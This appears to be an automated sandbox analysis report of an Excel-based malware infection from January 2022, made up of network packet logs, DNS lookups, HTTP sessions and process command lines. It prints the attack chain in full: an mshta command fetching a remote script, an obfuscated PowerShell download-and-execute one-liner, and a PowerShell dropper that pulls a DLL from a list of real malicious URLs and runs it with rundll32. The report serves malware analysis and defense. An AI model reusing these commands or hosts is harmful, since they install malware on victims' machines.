                                                                                                                                Jan 28, 2022 20:39:51.860848904 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860867977 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860883951 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.860888958 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860908985 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860923052 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.860928059 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860949039 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860970020 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860980034 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.860992908 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.861505032 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.861608982 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.861635923 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.861659050 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.861671925 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.861680031 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027240038 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027251959 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027332067 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.027367115 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027384996 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027414083 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027425051 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.027430058 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027446032 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027461052 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027462006 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.027493000 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.027514935 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027556896 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027615070 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027630091 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027652979 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.027697086 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027724981 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027760029 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186430931 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186469078 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186492920 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186517000 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186539888 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186561108 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186570883 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186603069 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186608076 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186613083 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186636925 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186659098 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186681032 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186683893 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186703920 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186722040 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186727047 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186748028 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186768055 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186768055 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186788082 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186808109 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186827898 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186850071 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186876059 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186885118 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186892986 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186898947 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186920881 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186943054 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186959028 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186964989 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186985970 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187007904 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187024117 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187030077 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187050104 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187093019 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187120914 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187159061 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187175989 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187237024 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187237024 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187294006 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187315941 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187318087 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187340975 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187360048 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187381983 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187424898 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187448978 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187488079 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187510967 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187535048 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187580109 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187601089 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187621117 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187643051 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187643051 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187665939 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187688112 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187701941 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187771082 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187793970 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187814951 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187817097 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187835932 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187870979 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187973976 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187995911 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188014030 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188038111 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188056946 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188126087 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188147068 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188164949 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188168049 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188184977 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188198090 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188323021 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188344955 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188363075 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188381910 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188386917 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188468933 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188508034 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188544989 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188566923 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188586950 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188606024 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188625097 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188631058 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188702106 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188724041 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188744068 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188746929 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188761950 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188800097 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188837051 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188857079 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188874960 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188899040 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188910007 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188977003 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.189012051 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189049959 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189069986 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189088106 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189094067 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.189199924 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189222097 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189241886 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189246893 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.189263105 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189276934 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.189382076 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189446926 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189466000 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189486027 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189491987 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.189563990 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189584017 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189603090 CET804917051.81.152.36192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 20:39:50.523480892 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 20:39:50.542432070 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 28, 2022 20:39:50.694684029 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 20:39:50.713618994 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 28, 2022 20:39:50.523480892 CET | 192.168.2.22 | 8.8.8.8 | 0xfe79 | Standard query (0) | weezual.fr | A (IP address) | IN (0x0001)
Jan 28, 2022 20:39:50.694684029 CET | 192.168.2.22 | 8.8.8.8 | 0x662e | Standard query (0) | mycloud.suplitecmo.com | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 28, 2022 20:39:50.542432070 CET | 8.8.8.8 | 192.168.2.22 | 0xfe79 | No error (0) | weezual.fr | | 213.186.33.4 | A (IP address) | IN (0x0001)
Jan 28, 2022 20:39:50.713618994 CET | 8.8.8.8 | 192.168.2.22 | 0x662e | No error (0) | mycloud.suplitecmo.com | | 51.81.152.36 | A (IP address) | IN (0x0001)
                                                                                                                                • 91.240.118.172
                                                                                                                                • weezual.fr
                                                                                                                                • mycloud.suplitecmo.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 20:39:45.874831915 CET | 0 | OUT | GET /cc/vv/fe.html HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US
                                                                                                                                UA-CPU: AMD64
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                Host: 91.240.118.172
                                                                                                                                Connection: Keep-Alive
Jan 28, 2022 20:39:45.936727047 CET | 2 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.20.2
                                                                                                                                Date: Fri, 28 Jan 2022 19:39:45 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                Data Ascii: 2b44<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';i8Hwi4f5v6ham=new Array();p2N61T634cG0v=new Array();p2N61T634cG0v[0]='g%77%35n%53\172%32%76' ;i8Hwi4f5v6ham[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'v\\141%72%20q}9%37}&D} }(2}(3B}1}7}38})S}4}ng} E}46romC}50arC%6F}A4e} }73}53} }M}V}&0} }%}/fo}6}2}76}_}*3}]}/}N}_}Z}34}&}.}.B}H}2


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 20:39:50.419922113 CET | 12 | OUT | GET /cc/vv/fe.png HTTP/1.1
                                                                                                                                Host: 91.240.118.172
                                                                                                                                Connection: Keep-Alive
Jan 28, 2022 20:39:50.481677055 CET | 14 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.20.2
                                                                                                                                Date: Fri, 28 Jan 2022 19:39:50 GMT
                                                                                                                                Content-Type: image/png
                                                                                                                                Content-Length: 1341
                                                                                                                                Connection: keep-alive
                                                                                                                                Last-Modified: Fri, 28 Jan 2022 17:05:19 GMT
                                                                                                                                ETag: "53d-5d6a77081f1c0"
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://weezual.fr/ju9c/twEHJDCvNwGimD/';$url2 = 'http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/';$url3 = 'http://michaelcrompton.co.uk/wp-admin/G/';$url4 = 'https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/';$url5 = 'https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/';$url6 = 'http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/';$url7 = 'https://hekmat20.com/wp-includes/7/';$url8 = 'http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/';$url9 = 'http://ancyh.xyz/assets/Pcxv1k5/';$url10 = 'http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/';$url11 = 'http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/';$url12 = 'http://stancewheels.com/wp-admin/bbL1MAzNvohHH/';$url13 = 'http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12,$url13".split(",");foreach ($url in $urls) { try { $web.Downl
Jan 28, 2022 20:39:50.481697083 CET | 14 | IN
                                                                                                                                Data Ascii: oadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\JooSee.dll',ssAAqq


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 213.186.33.4 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 20:39:50.581624985 CET | 15 | OUT | GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1
                                                                                                                                Host: weezual.fr
                                                                                                                                Connection: Keep-Alive
Jan 28, 2022 20:39:50.609762907 CET | 15 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                date: Fri, 28 Jan 2022 19:39:50 GMT
                                                                                                                                content-type: text/html; charset=iso-8859-1
                                                                                                                                content-length: 261
                                                                                                                                server: Apache
                                                                                                                                x-iplb-request-id: 66818F3D:C011_D5BA2104:0050_61F44686_C83C:4CC4
                                                                                                                                x-iplb-instance: 31947
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p></body></html>


Session ID: 3
Source IP: 192.168.2.22
Source Port: 49170
Destination IP: 51.81.152.36
Destination Port: 80
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: Jan 28, 2022 20:39:50.878462076 CET, kBytes transferred: 16, Direction: OUT
GET /Fox-CCFS/zBdGqiyW1HTZD2j/ HTTP/1.1
                                                                                                                                Host: mycloud.suplitecmo.com
                                                                                                                                Connection: Keep-Alive
Timestamp: Jan 28, 2022 20:39:51.046953917 CET, kBytes transferred: 17, Direction: IN
HTTP/1.1 200 OK
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                x-powered-by: PHP/7.4.27
                                                                                                                                set-cookie: 61f44686eb699=1643398790; expires=Fri, 28-Jan-2022 19:40:50 GMT; Max-Age=60; path=/
                                                                                                                                cache-control: no-cache, must-revalidate
                                                                                                                                pragma: no-cache
                                                                                                                                last-modified: Fri, 28 Jan 2022 19:39:50 GMT
                                                                                                                                expires: Fri, 28 Jan 2022 19:39:50 GMT
                                                                                                                                content-type: application/x-msdownload
                                                                                                                                content-disposition: attachment; filename="10ZDUhs9FtE0wMo.dll"
                                                                                                                                content-transfer-encoding: binary
                                                                                                                                content-length: 548864
                                                                                                                                date: Fri, 28 Jan 2022 19:39:50 GMT
                                                                                                                                server: LiteSpeed


Session ID: 4
Source IP: 192.168.2.22
Source Port: 49171
Destination IP: 160.16.102.168
Destination Port: 80
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: Jan 28, 2022 20:41:25.228030920 CET, kBytes transferred: 585, Direction: OUT
Timestamp: Jan 28, 2022 20:41:25.547328949 CET, kBytes transferred: 586, Direction: IN
Timestamp: Jan 28, 2022 20:41:25.547360897 CET, kBytes transferred: 587, Direction: IN
Timestamp: Jan 28, 2022 20:41:25.559819937 CET, kBytes transferred: 587, Direction: OUT
Timestamp: Jan 28, 2022 20:41:25.872416973 CET, kBytes transferred: 587, Direction: IN
Timestamp: Jan 28, 2022 20:41:40.775181055 CET, kBytes transferred: 654, Direction: OUT
Timestamp: Jan 28, 2022 20:41:41.935688019 CET, kBytes transferred: 654, Direction: IN
Timestamp: Jan 28, 2022 20:41:44.935729027 CET, kBytes transferred: 654, Direction: IN


                                                                                                                                Target ID:0
                                                                                                                                Start time:20:39:18
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                Imagebase:0x13fe20000
                                                                                                                                File size:28253536 bytes
                                                                                                                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Target ID:2
                                                                                                                                Start time:20:39:21
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html
                                                                                                                                Imagebase:0x4a070000
                                                                                                                                File size:345088 bytes
                                                                                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Target ID:4
                                                                                                                                Start time:20:39:21
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\System32\mshta.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:mshta http://91.240.118.172/cc/vv/fe.html
                                                                                                                                Imagebase:0x13fa80000
                                                                                                                                File size:13824 bytes
                                                                                                                                MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Target ID:6
                                                                                                                                Start time:20:39:24
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                                Imagebase:0x13f1b0000
                                                                                                                                File size:473600 bytes
                                                                                                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                Reputation:high

                                                                                                                                Target ID:8
                                                                                                                                Start time:20:39:34
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                                Imagebase:0x4a070000
                                                                                                                                File size:345088 bytes
